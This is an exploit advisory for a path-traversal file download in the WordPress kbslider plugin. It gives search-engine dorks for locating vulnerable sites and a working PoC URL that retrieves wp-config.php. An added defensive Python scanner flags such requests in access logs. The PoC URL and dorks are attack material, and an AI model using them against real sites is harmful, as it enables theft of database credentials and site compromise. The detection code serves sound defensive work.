
WordPress kbslider <= 1.0.1 Arbitrary File Download

Author: wlhaan hacker, Published: 01-10-2014
######################
# Exploit Title : WordPress kbslider <= 1.0.1 Arbitrary File Download

# Exploit Author : wlhaan hacker

# Vendor Homepage : http://wordpresspluginsamples.com/kbslider

# Dork Google: kbslider.php "index of"

or
Index of /wp-content/plugins/kbslider


# Date : 2014-08-11

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox


######################

# Description

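WordPress kbslider <= 1.0.1 suffers from an arbitrary file download vulnerability. The img parameter of the kbslider_show_image AJAX action accepts a path containing ../, which lets a request reach files such as wp-config.php.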


######################

# PoC

http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php

enjoy:)
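
Added example (not part of the original advisory and not plugin code): a check that defenders can run over web server access logs to find requests matching the PoC pattern above, including percent-encoded forms of the same path. The combined log format, the image-extension allowlist and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request and status fields of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: legitimate slider requests only ever name image files.
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding, with a fixed bound on the depth."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return (reason, http_status) for a suspicious kbslider request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url, status = urlsplit(m.group(1)), int(m.group(2))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    if "kbslider_show_image" not in params.get("action", []):
        return None
    for raw in params.get("img", []):
        img = fully_decode(raw).replace("\\", "/")
        if ".." in img.split("/"):
            return ("path traversal in img", status)
        if not img.lower().endswith(IMAGE_EXT):
            return ("non-image file requested", status)
    return None

def scan(lines):
    """Return [(line_number, reason, http_status)] for every flagged line."""
    found = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, *hit) for n, hit in found if hit]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Aug/2014:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php HTTP/1.1" 200 3121',
    '203.0.113.5 - - [11/Aug/2014:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=%252e%252e%252fwp-config.php HTTP/1.1" 404 0',
    '198.51.100.7 - - [11/Aug/2014:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=slide1.jpg HTTP/1.1" 200 48211',
    '198.51.100.7 - - [11/Aug/2014:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A flagged line with status 200 and a non-empty response means wp-config.php may have been served, so the database credentials and secret keys in that file should be rotated. Parameters sent in a POST body do not appear in access logs and are not covered by this check.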


#####################

Discovered By : wlhaan hacker





https://twitter.com/waleedal3ybani
https://www.facebook.com/waleed.alaibani



#####################
